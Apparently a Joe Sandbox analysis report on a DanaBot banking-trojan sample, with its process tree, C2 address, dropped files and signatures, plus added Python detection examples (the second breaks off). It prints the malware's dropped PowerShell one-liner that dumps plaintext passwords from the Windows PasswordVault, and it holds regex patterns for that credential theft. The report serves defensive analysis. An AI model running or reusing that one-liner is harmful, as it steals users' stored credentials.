ID: 453837
Sample Name: X4xY5J1GWc.exe
Cookbook: default.jbs
Time: 08:27:20
Date: 25/07/2021
Version: 33.0.0 White Diamond

Table of Contents

Table of Contents 2
Windows Analysis Report X4xY5J1GWc.exe 4
  Overview 4
    General Information 4, Detection 4, Signatures 4, Classification 4, Tree 4
    Malware Configuration 4: Threatname: DanaBot 4
    Yara Overview 4: Dropped Files 4
    Sigma Overview 5: System Summary 5
    Jbx Signature Overview 5: AV Detection 5, Compliance 5, Networking 5, E-Banking Fraud 5, Spam, unwanted Advertisements and Ransom Demands 5, System Summary 5, Data Obfuscation 5, Malware Analysis System Evasion 5, HIPS / PFW / Operating System Protection Evasion 6, Stealing of Sensitive Information 6, Remote Access Functionality 6
    Mitre Att&ck Matrix 6
    Behavior Graph 6
    Screenshots 7: Thumbnails 7
  Antivirus, Machine Learning and Genetic Malware Detection 8: Initial Sample 8, Dropped Files 8, Unpacked PE Files 8, Domains 8, URLs 8
  Domains and IPs 9: Contacted Domains 9, Contacted URLs 9, URLs from Memory and Binaries 9, Contacted IPs 9 (Public 9, Private 9)
  General Information 9
  Simulations 10: Behavior and APIs 10
  Joe Sandbox View / Context 10: IPs 10, Domains 10, ASN 10, JA3 Fingerprints 11, Dropped Files 11
  Created / dropped Files 11
  Static File Info 14: General 14, File Icon 14, Static PE Info 14 (General 14, Entrypoint Preview 14, Data Directories 14, Sections 15, Resources 15, Imports 15, Version Infos 15, Possible Origin 15)
  Network Behavior 15: Network Port Distribution 15, TCP Packets 15, UDP Packets 15, DNS Queries 15, DNS Answers 15
  Code Manipulations 15
  Statistics 15: Behavior 16
  System Behavior 16
    Analysis Process: X4xY5J1GWc.exe PID: 6644 Parent PID: 5920 16 (General 16; File Activities 16: File Created 16, File Written 16)
    Analysis Process: rundll32.exe PID: 6712 Parent PID: 6644 16 (General 16; File Activities 16)
    Analysis Process: rundll32.exe PID: 7140 Parent PID: 6712 16 (General 17; File Activities 17: File Created 17, File Written 17, File Read 17; Registry Activities 17: Key Value Created 17, Key Value Modified 17)
    Analysis Process: powershell.exe PID: 6764 Parent PID: 7140 17 (General 17; File Activities 17: File Created 17, File Deleted 17, File Written 17, File Read 17)
    Analysis Process: conhost.exe PID: 6568 Parent PID: 6764 17 (General 18)
    Analysis Process: powershell.exe PID: 5484 Parent PID: 7140 18 (General 18; File Activities 18: File Created 18, File Read 18)
    Analysis Process: conhost.exe PID: 5548 Parent PID: 5484 18 (General 18)
  Disassembly 18: Code Analysis 19

Copyright Joe Security LLC 2021

Windows Analysis Report X4xY5J1GWc.exe

Overview

General Information

Sample Name: X4xY5J1GWc.exe
Analysis ID: 453837
MD5: ab4cf6181cfb102…
SHA1: ac756cbff2887e8…
SHA256: f7c566ca7413a12…
Tags: DanaBot exe

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Classification

Classification wheel labels in the original graphic: Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware (scale: malicious, suspicious, clean). Categories set for this sample, per the classification string mal100.bank.troj.adwa.spyw.evad.winEXE in General Information: Banker, Trojan / Bot, Adware, Spyware, Evader.

Signatures

Malicious:
  Detected unpacking (changes PE section rights)
  Detected unpacking (overwrites its own PE header)
  Found malware configuration
  Multi AV Scanner detection for dropped file
  Multi AV Scanner detection for submitted file
  System process connects to network (likely due to code injection or exploit)
  Yara detected DanaBot stealer dll
  Bypasses PowerShell execution policy
  C2 URLs / IPs found in malware configuration
  Enables a proxy for the internet explorer
  Machine Learning detection for sample
  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
  Sets a proxy for the internet explorer
  Sigma detected: Suspicious Script Execution From Temp Folder
  Tries to harvest and steal browser information (history, passwords, etc)

Suspicious / informational (names truncated in the original report layout):
  Contains functionality to dynamically …
  Contains functionality to query CPU …
  Contains functionality to query locale …
  Contains functionality to read the PEB
  Contains long sleeps (>= 3 min)
  Creates a process in suspended mode …
  Detected potential crypto function
  Drops PE files
  Enables debug privileges
  Extensive use of GetProcAddress (o…
  Found a high number of Window / Us…
  Found potential string decryption / a…
  IP address seen in connection with o…
  Internet Provider seen in connection …
  Is looking for software installed on th…
  May sleep (evasive loops) to hinder …
  PE file contains sections with non-s…
  PE file contains strange resources
  Queries the volume information (nam…
  Sample execution stops while process…
  Sample file is different than original …
  Uses 32bit PE files
  Uses Microsoft's Enhanced Cryptog…
  Uses code obfuscation techniques (…

Process Tree

System is w10x64

X4xY5J1GWc.exe (PID: 6644, cmdline: 'C:\Users\user\Desktop\X4xY5J1GWc.exe', MD5: AB4CF6181CFB102EC86C66D56AF2D229)
  rundll32.exe (PID: 6712, cmdline: C:\Windows\system32\rundll32.exe C:\Users\user\Desktop\X4XY5J~1.TMP,S C:\Users\user\Desktop\X4XY5J~1.EXE, MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    rundll32.exe (PID: 7140, cmdline: C:\Windows\system32\RUNDLL32.EXE C:\Users\user\Desktop\X4XY5J~1.TMP,Z0sc, MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      powershell.exe (PID: 6764, cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Executionpolicy bypass -File 'C:\Users\user\AppData\Local\Temp\tmpD845.tmp.ps1', MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        conhost.exe (PID: 6568, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      powershell.exe (PID: 5484, cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Executionpolicy bypass -File 'C:\Users\user\AppData\Local\Temp\tmpA617.tmp.ps1', MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        conhost.exe (PID: 5548, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  cleanup

The dropped DLL (X4XY5J~1.EXE.tmp, short name X4XY5J~1.TMP) is loaded twice through rundll32.exe: first via its export S, with the path of the original EXE passed as argument, then via export Z0sc from the child rundll32.exe instance (PID 7140), which is the process that writes both PowerShell scripts into %LOCALAPPDATA%\Temp and launches them (see Created / dropped Files and System Behavior below).

Malware Configuration

Threatname: DanaBot

{
  "C2 list": [
    "142.11.244.124:443"
  ],
  "Embedded Hash": "6AD9FE4F9E491E785665E0D144F61DAB"
}

Yara Overview

Dropped Files

Source: C:\Users\user\Desktop\X4XY5J~1.EXE.tmp
Rule: JoeSecurity_DanaBot_stealer_dll_1
Description: Yara detected DanaBot stealer dll
Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: Non Interactive PowerShell
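The two Sigma hits above and the process tree in the Overview describe one chain: rundll32.exe loading the dropped DLL from the user's Desktop, then launching a non-interactive PowerShell with -ExecutionPolicy bypass on a script under %LOCALAPPDATA%\Temp. The Python below is an added example, not Joe Sandbox code and not the Sigma rules themselves, that re-implements that logic over process-creation records constructed from this report's PIDs and command lines. The record layout (Sysmon event 1 / Security 4688 style), the rule names, the set of parent images treated as "interactive", and the benign control event are assumptions of the example.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record: pid, parent pid, image path, command line."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed events mirroring the process tree in this report. PIDs, image paths
# and command lines are taken from the page; the record layout is an assumption
# (Sysmon EID 1 / 4688 style), not a Joe Sandbox export format.
EVENTS = [
    ProcEvent(6644, 5920, r"C:\Users\user\Desktop\X4xY5J1GWc.exe",
              r"'C:\Users\user\Desktop\X4xY5J1GWc.exe'"),
    ProcEvent(6712, 6644, r"C:\Windows\SysWOW64\rundll32.exe",
              r"C:\Windows\system32\rundll32.exe C:\Users\user\Desktop\X4XY5J~1.TMP,S C:\Users\user\Desktop\X4XY5J~1.EXE"),
    ProcEvent(7140, 6712, r"C:\Windows\SysWOW64\rundll32.exe",
              r"C:\Windows\system32\RUNDLL32.EXE C:\Users\user\Desktop\X4XY5J~1.TMP,Z0sc"),
    ProcEvent(6764, 7140, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Executionpolicy bypass -File 'C:\Users\user\AppData\Local\Temp\tmpD845.tmp.ps1'"),
    ProcEvent(6568, 6764, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(5484, 7140, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Executionpolicy bypass -File 'C:\Users\user\AppData\Local\Temp\tmpA617.tmp.ps1'"),
    ProcEvent(5548, 5484, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    # Constructed benign control: a logged-on user running an admin script from Explorer.
    ProcEvent(9001, 4000, r"C:\Windows\explorer.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(9002, 9001, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\Scripts\rotate-logs.ps1"),
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Parents that imply a human at the keyboard; anything else counts as non-interactive (assumption).
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "windowsterminal.exe"}

TEMP_SCRIPT = re.compile(r"(?i)\\appdata\\local\\temp\\[^\s'\"]+\.(ps1|psm1|vbs|js|bat|cmd)")
EP_BYPASS = re.compile(r"(?i)-e[a-z]*\s+bypass")  # -ExecutionPolicy / -ep / -exec ... bypass
RUNDLL_ARG = re.compile(r"(?i)rundll32(?:\.exe)?\"?\s+\"?([^,\s\"]+)\s*,\s*(\S+)")  # <dll>,<export>
USER_WRITABLE = re.compile(r"(?i)\\(users|programdata)\\")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev: ProcEvent, by_pid: dict) -> list:
    """Return the rule names that fire for one event, given its parent record."""
    hits = []
    img = basename(ev.image)
    parent = by_pid.get(ev.ppid)
    pimg = basename(parent.image) if parent else ""
    if img in SCRIPT_HOSTS and TEMP_SCRIPT.search(ev.cmdline):
        hits.append("suspicious_script_execution_from_temp")
    if img in POWERSHELL and parent is not None and pimg not in INTERACTIVE_PARENTS:
        hits.append("non_interactive_powershell")
    if img in POWERSHELL and EP_BYPASS.search(ev.cmdline):
        hits.append("powershell_execution_policy_bypass")
    if img == "rundll32.exe":
        m = RUNDLL_ARG.search(ev.cmdline)
        if m and USER_WRITABLE.search(m.group(1)):
            hits.append("rundll32_dll_from_user_writable_path")
    # Lineage rule: the rundll32.exe stage spawning PowerShell on a temp script.
    if pimg == "rundll32.exe" and "suspicious_script_execution_from_temp" in hits:
        hits.append("rundll32_spawns_powershell_temp_script")
    return hits


def scan(events: list) -> dict:
    """Map pid -> fired rules for every event with at least one hit."""
    by_pid = {e.pid: e for e in events}
    results = {}
    for e in events:
        hits = evaluate(e, by_pid)
        if hits:
            results[e.pid] = hits
    return results


if __name__ == "__main__":
    for pid, rules in scan(EVENTS).items():
        print(pid, ", ".join(rules))
```

Only the two rundll32.exe instances and the two PowerShell children fire; the sample itself, conhost.exe and the Explorer-launched control script stay silent. The lineage rule is the one worth alerting on: a script host whose parent is rundll32.exe has no benign administrative explanation, whereas each of the single-event rules can appear in software deployment tooling.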

Jbx Signature Overview


AV Detection:

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected DanaBot stealer dll

Machine Learning detection for sample

Compliance:

Detected unpacking (overwrites its own PE header)

Networking:

C2 URLs / IPs found in malware configuration

E-Banking Fraud:

Yara detected DanaBot stealer dll

Sets a proxy for the internet explorer

Spam, unwanted Advertisements and Ransom Demands:

Enables a proxy for the internet explorer

Sets a proxy for the internet explorer

System Summary:

Data Obfuscation:

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Malware Analysis System Evasion:

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Bypasses PowerShell execution policy

Stealing of Sensitive Information:

Yara detected DanaBot stealer dll

Tries to harvest and steal browser information (history, passwords, etc)

Remote Access Functionality:

Yara detected DanaBot stealer dll

Mitre Att&ck Matrix

The matrix is a grid in the original report with one column per tactic (Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, Command and Control, Network Effects). Cells with hits, with the hit counts shown in the cell:

Execution: Windows Management Instrumentation 1; Native API 1; PowerShell 1
Persistence: Application Shimming 1
Privilege Escalation: Application Shimming 1; Process Injection 1 1 2
Defense Evasion: Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 3; Software Packing 2 2; Masquerading 1; Virtualization/Sandbox Evasion 1 2 1; Process Injection 1 1 2; Rundll32 1
Credential Access: OS Credential Dumping 1
Discovery: System Time Discovery 1; File and Directory Discovery 3; System Information Discovery 4 7; Security Software Discovery 2 1; Process Discovery 1 2; Virtualization/Sandbox Evasion 1 2 1; Application Window Discovery 1; Remote System Discovery 1
Collection: Archive Collected Data 1; Man in the Browser 2; Data from Local System 1
Exfiltration: Exfiltration Over Other Network Medium 1
Command and Control: Encrypted Channel 2 2; Non-Application Layer Protocol 1; Application Layer Protocol 1 2
Initial Access, Lateral Movement, Network Effects: no hits

Behavior Graph

Behavior Graph ID: 453837
Sample: X4xY5J1GWc.exe
Startdate: 25/07/2021
Architecture: WINDOWS
Score: 100

Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet

The graph is an image in the original report; its nodes and edges, as far as they can be recovered from the layout:

X4xY5J1GWc.exe
  signatures: Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; Found malware configuration; 4 other signatures
  dropped: C:\Users\user\Desktop\X4XY5J~1.EXE.tmp (PE32)
    signatures on the dropped file: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header)
  started: rundll32.exe
    started: rundll32.exe (Is malicious)
      signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Bypasses PowerShell execution policy; System process connects to network (likely due to code injection or exploit); Tries to harvest and steal browser information (history, passwords, etc); Sets a proxy for the internet explorer; Enables a proxy for the internet explorer
      network: 142.11.244.124 port 443 (local ports 49720, 49733), HOSTWINDSUS, United States; 127.0.0.1 (unknown)
      DNS: localhost; 8.8.8.8.in-addr.arpa
      dropped: C:\Users\user\AppData\...\tmpD845.tmp.ps1 (ASCII)
      started: powershell.exe, which started conhost.exe
      started: powershell.exe, which started conhost.exe

Node counters shown in the graph: rundll32.exe 2; rundll32.exe 10 and 22; powershell.exe 16 and 5.

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow. (The screenshot images are not reproduced in this copy of the report.)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source          Detection  Scanner         Label
X4xY5J1GWc.exe  41%        Virustotal
X4xY5J1GWc.exe  100%       Joe Sandbox ML

Dropped Files

Source                                  Detection  Scanner        Label
C:\Users\user\Desktop\X4XY5J~1.EXE.tmp  33%        ReversingLabs  Win32.Trojan.Wacatac

Unpacked PE Files

Source                                Detection  Scanner  Label
0.3.X4xY5J1GWc.exe.29a0000.0.unpack   100%       Avira    TR/Crypt.XPACK.Gen

Domains

No Antivirus matches

URLs

Source                             Detection  Scanner          Label
pesterbdd.com/images/Pester.png    0%         URL Reputation   safe
142.11.244.124:443                 0%         Avira URL Cloud  safe
https://go.micro                   0%         URL Reputation   safe

Domains and IPs

Contacted Domains

Name                  IP       Active   Malicious  Antivirus Detection  Reputation
8.8.8.8.in-addr.arpa  unknown  unknown  false      unknown

Contacted URLs

Name                Malicious  Antivirus Detection     Reputation
142.11.244.124:443  true       Avira URL Cloud: safe   unknown

The "safe" URL-cloud verdict conflicts with the malware configuration, which names this address as the C2 (see Malware Configuration); the configuration extracted from the sample is the authoritative source here, and the IP is marked malicious in the Contacted IPs table below.

URLs from Memory and Binaries

Contacted IPs

Public

IP              Domain   Country        ASN    ASN Name     Malicious
142.11.244.124  unknown  United States  54290  HOSTWINDSUS  true

Private

IP: 127.0.0.1

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 453837
Start date: 25.07.2021
Start time: 08:27:20
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 25s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: X4xY5J1GWc.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled, AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.adwa.spyw.evad.winEXE@11/10@2/2
EGA Information: Failed
HDC Information: Successful, ratio: 83% (good quality ratio 72.1%); Quality average: 75.6%; Quality standard deviation: 34.4%
HCA Information: Successful, ratio: 98%; Number of executed functions: 0; Number of non-executed functions: 0
Cookbook Comments: Adjust boot time; Enable AMSI; Found application associated with file extension: .exe

Simulations

Behavior and APIs

Time      Type             Description
08:28:22  API Interceptor  1x Sleep call for process: rundll32.exe modified
08:29:51  API Interceptor  28x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match: 142.11.244.124

Associated samples (all detected as malicious): pAx6Ls0pm6.exe, BVRk9asWP6.exe, K7ApMMTwNr.exe, rmUdUjPaZV.exe, Lc9fv5R312.exe, SecuriteInfo.com.W32.AIDetect.malware2.25613.exe, FS5lCJ3vLB.exe, mhzLXMrRjD.exe, MaXx6Zsyj4.exe, HCl0fpurw4.exe, 5Wp2vuDivo.exe, v6KB4R3tiS.exe, pZWK8BYXwF.exe, nN0ZQO5HOJ.exe, VhPZlSG8Ak.exe, jpVN8Lbg2x.exe, Mg3Yi6MsOo.exe, SecuriteInfo.com.W32.AIDetect.malware2.2131.exe, 2AiZ0cWYoh.exe, dGzO0OsUti.exe

Domains

No context

ASN

Match: HOSTWINDSUS

Associated sample (all detected as malicious) and the HOSTWINDSUS address it contacted:
pAx6Ls0pm6.exe: 142.11.244.124
BVRk9asWP6.exe: 142.11.244.124
K7ApMMTwNr.exe: 142.11.244.124
rmUdUjPaZV.exe: 142.11.244.124
Iv4uSNkm1O.exe: 108.174.195.201
TRINAQX4SB.exe: 108.174.195.201
Lc9fv5R312.exe: 142.11.244.124
K8GW0zzZSL.exe: 108.174.195.201
SecuriteInfo.com.W32.AIDetect.malware2.25613.exe: 142.11.244.124
srK9tqOn7i.exe: 108.174.195.201
FS5lCJ3vLB.exe: 142.11.244.124
mhzLXMrRjD.exe: 142.11.244.124
MaXx6Zsyj4.exe: 142.11.244.124
HCl0fpurw4.exe: 142.11.244.124
5Wp2vuDivo.exe: 142.11.244.124
PURCHASE-ORDER.exe: 192.236.179.121
v6KB4R3tiS.exe: 142.11.244.124
476.js: 142.11.195.33
ATT93916.HTM: 23.254.230.117
pZWK8BYXwF.exe: 142.11.244.124

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Jvgzbfh.tmp
  Process: C:\Windows\SysWOW64\rundll32.exe
  File Type: data
  Category: modified
  Size (bytes): 54868208
  Entropy (8bit): 7.999985812538202
  Encrypted: true
  SSDEEP: 1572864:4S70iMLtGEIS70iMLtGEIS70iMLtGEFS70iMLtGEi:4S7N6jIS7N6jIS7N6jFS7N6ji
  MD5: 84FFB960D7258E934F8DAE9AB4C658EC
  SHA1: 5E799071A501600EFFFB47DDB9F9162D12A62957
  SHA-256: F2B839FB1313D802F11759F7EBEEAB7E70D50252D1D977D8B66E643BC85BC38A
  SHA-512: 53A5C58ECA8011E1352769AA48B0A6D510C5C6169EC39712682D90D019A8EE7A7143586069E4C861DBB85BC8647BDEE8EF81E6E80B2127B7FD0C026A263F5A0A
  Malicious: false
  Reputation: low
  Preview: .....*...... ;.R.4.S...E.<.A..?...ZT.n..V..t.$.3E..'.\b.=.Q.O...... H...B..;i...... @.....(.|-....:.#...xP.:.^.:....<.W.P.UW.7.PlTq.L/'3...(C..*7 ...|h.K..C.....p#tq.HHW....@..>....u.Yel.z..3. ..D..PL..)h+...... @.S..wC..|..0.e....M|.....N.c[P.`(h.....C..:9.+..o....dSf...... K..6.v.Y.e...... }>.._?.."n...V.v.#&..{.].....G9...C [email protected]...... *?...(..M.N.|

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  File Type: data
  Category: dropped
  Size (bytes): 17808
  Entropy (8bit): 5.568500012059895
  Encrypted: false
  SSDEEP: 384:0t9a30G6GPKb08t5GCjpHYSBKn1eYaclVI4769GSJeCbG8eSyBb:+GPG0i5Y4KIYaclVVD6S
  MD5: C147F994C7B10EB62FE59F2AC0587BF2
  SHA1: 762B179135D3A6C7CF6BA7E75DBD84B9E2B9F312
  SHA-256: 8DA7EB4B0DEEFF11B8E611356365796035EE92DA4CC10BDAAE797361503960D4
  SHA-512: 163047E9F72379B37B2BF9D471B7454B48E5F2E1E2CEB991671711AB6A2B68C26F948C66A69A11C8AD0A8CA2E3992F931E8B797C1982B5CFF27E52DB4CC6E336
  Malicious: false
  Reputation: low
  Preview: @...e...... M...... 0.....h.8...... @...... H...... <@.^.L."My...:'...... Microsoft.PowerShell.ConsoleHostD...... fZve...F.....x.)...... System.Management.Automation4...... [...{a.C..%6..h...... System.Core.0...... G-.o...A...4B...... System..4...... Zg5..:O..g..q...... System.Xml..L...... 7.....J@...... ~...... #.Microsoft.Management.Infrastructure.8...... '....L..}...... System.Numerics.@...... Lo...QN...... ..m...... System.Transactions.<...... ):gK..G...$.1.q...... System.ConfigurationP...... /.C..J..%...]...... %.Microsoft.PowerShell.Commands.Utility...D...... -.D.F.<;.nt.1 ...... System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\4708281.tmp
  Process: C:\Windows\SysWOW64\rundll32.exe
  File Type: SQLite 3.x database, last written using SQLite version 3032001
  Category: dropped
  Size (bytes): 114688
  Entropy (8bit): 1.0541494269156084
  Encrypted: false
  SSDEEP: 192:I3rHdMHGTPVbSYgbCP46w/1VumaBIy7OzlG4oNH:I3r9lgbFB/1VumaBI0olG4oN
  MD5: 96B99E0DED5AB6204D94A78CE1EF3D84
  SHA1: E5B26C7446BE7741AE2F590C980397D41B9B7990
  SHA-256: EAC19382513BFD1A2E5E42EC825F8CE21F924DB534E27DFA5F0E150DA4D50A1E
  SHA-512: 95D169EADBE10AE4B1C2BEF5E89B41A9D8D4F248C93AEF78AE23D127FDEA013C1D69DF1B915503098BE246FE10280F3759AD90169191880CDD2880D983FC374A
  Malicious: false
  Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hyi54dtc.mhf.ps1
  Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  File Type: very short file (no magic)
  Category: dropped
  Size (bytes): 1
  Entropy (8bit): 0.0
  Encrypted: false
  SSDEEP: 3:U:U
  MD5: C4CA4238A0B923820DCC509A6F75849B
  SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
  SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
  SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
  Malicious: false
  Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_irggavko.loy.psm1
  Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  File Type: very short file (no magic)
  Category: dropped
  Size (bytes): 1
  Entropy (8bit): 0.0
  Encrypted: false
  SSDEEP: 3:U:U
  MD5: C4CA4238A0B923820DCC509A6F75849B
  SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
  SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
  SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
  Malicious: false
  Preview: 1

C:\Users\user\AppData\Local\Temp\tmpA617.tmp.ps1
  Process: C:\Windows\SysWOW64\rundll32.exe
  File Type: ASCII text, with no line terminators
  Category: dropped
  Size (bytes): 83
  Entropy (8bit): 4.679315715874588
  Encrypted: false
  SSDEEP: 3:ndgscLFvm2PN+E2J5xAILuIV:n5cxOeN723fLHV
  MD5: 135D884D61C5492A7586C091A98F5E58
  SHA1: 06B8F23339F549164C19CCFB6F55442D2525B15D
  SHA-256: 9D647C8C5513DAFAFF208433596DB9E11BF2C9D5DFCD9D75874F77A7FF7C71DC
  SHA-512: 0D425818EC8E521C0C64449373A0B1523E8954E17059DD98C549CCFA11C72FF3FD8447C30A78BD6EE2E6CD1D45398B645A90A4BEDEA2D84DBD6467C09070B18D
  Malicious: false
  Preview: nslookup.exe -type=any localhost > C:\Users\user\AppData\Local\Temp\tmpA618.tmp

The script issues a DNS ANY query for localhost through the configured resolver and writes the result to a temp file named one higher than the script's own (the same tmpXXXX / tmpXXXX+1 pairing as tmpD845 / tmpD846 below); the PTR and type-255 queries in the DNS Queries section, and the Name error answer, are this command's traffic.

C:\Users\user\AppData\Local\Temp\tmpD845.tmp.ps1
  Process: C:\Windows\SysWOW64\rundll32.exe
  File Type: ASCII text, with CRLF line terminators
  Category: dropped
  Size (bytes): 264
  Entropy (8bit): 5.127637790595558
  Encrypted: false
  SSDEEP: 6:r8DYuqPwYuq4xJJS8T1YuqPmwCOsN723fy1w:r89soLfXLsIOAal
  MD5: 27BD405965E27D5FB409A5643FC142A0
  SHA1: 24DB6EC3708214117466325E02FBB2E3941E7014
  SHA-256: 690B710257CC89263C4B88A9905157EC6343B6A72968F49DC6978A3C8A1EE5DA
  SHA-512: AA9F9C152E3BD6ABA20190428550C24B66330B6FB764D7531D2B1EB237BEF1204DC776E55377CE424CC4B7EF57D39C61963AB8319D469CF3311DAF498A72EF56
  Malicious: true
  Preview:
    [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
    (new-object Windows.Security.Credentials.PasswordVault).RetrieveAll() | % { $_.RetrievePassword(); $_ } > "C:\Users\user\AppData\Local\Temp\tmpD846.tmp"

The first line projects the WinRT PasswordVault class into the desktop PowerShell session; the second enumerates every stored entry, fills in its plaintext password with RetrievePassword() and writes the objects to a temp file for the rundll32.exe stage to collect. PasswordVault is the Web Credentials store of Windows Credential Manager, and it is readable this way by any process running as the user, with no elevation and no prompt, which is why this one-liner is enough for the "Tries to harvest and steal browser information" signature.
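Both scripts dropped by the rundll32.exe stage are short one-liners, so script-block logging (PowerShell event 4104) or an AMSI consumer is where a defender sees their content. The Python below is an added example, not Joe Sandbox code, that scores script text against the credential-access pattern of tmpD845.tmp.ps1 and the DNS probe of tmpA617.tmp.ps1. The script bodies are copied from the previews above; the indicator names, weights, verdict thresholds and the benign control script are constructed for this example.

```python
import re

# Script bodies as they appear in the dropped-file previews on this page
# (tmpD845.tmp.ps1 and tmpA617.tmp.ps1); BENIGN is a constructed control.
TMPD845 = (
    "[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]\r\n"
    r'(new-object Windows.Security.Credentials.PasswordVault).RetrieveAll() | % { $_.RetrievePassword(); $_ } > "C:\Users\user\AppData\Local\Temp\tmpD846.tmp"'
)
TMPA617 = r"nslookup.exe -type=any localhost > C:\Users\user\AppData\Local\Temp\tmpA618.tmp"
BENIGN = r"Get-ChildItem C:\Logs -Filter *.log | Where-Object Length -gt 1MB | Remove-Item"

# (name, pattern, weight). Names and weights are this example's own choice, not a vendor score.
INDICATORS = [
    ("winrt_projection",    re.compile(r"(?i)ContentType\s*=\s*WindowsRuntime"), 1),
    ("passwordvault_type",  re.compile(r"(?i)Windows\.Security\.Credentials\.PasswordVault"), 3),
    ("password_retrieval",  re.compile(r"(?i)\.Retrieve(?:All|Password)\s*\("), 3),
    ("output_to_user_temp", re.compile(r"(?i)>\s*\"?[a-z]:\\[^\"\r\n]*\\AppData\\Local\\Temp\\"), 1),
    ("dns_probe_to_file",   re.compile(r"(?i)\bnslookup(?:\.exe)?\b[^\r\n]*>"), 1),
]
CREDENTIAL_ACCESS = 5  # the PasswordVault type plus any Retrieve* call already reaches this


def analyze_script(text: str) -> dict:
    """Score one script block; return matched indicator names, the score and a verdict."""
    matched = [name for name, pat, _ in INDICATORS if pat.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in matched)
    if score >= CREDENTIAL_ACCESS:
        verdict = "credential_access"
    elif score > 0:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"matched": matched, "score": score, "verdict": verdict}


if __name__ == "__main__":
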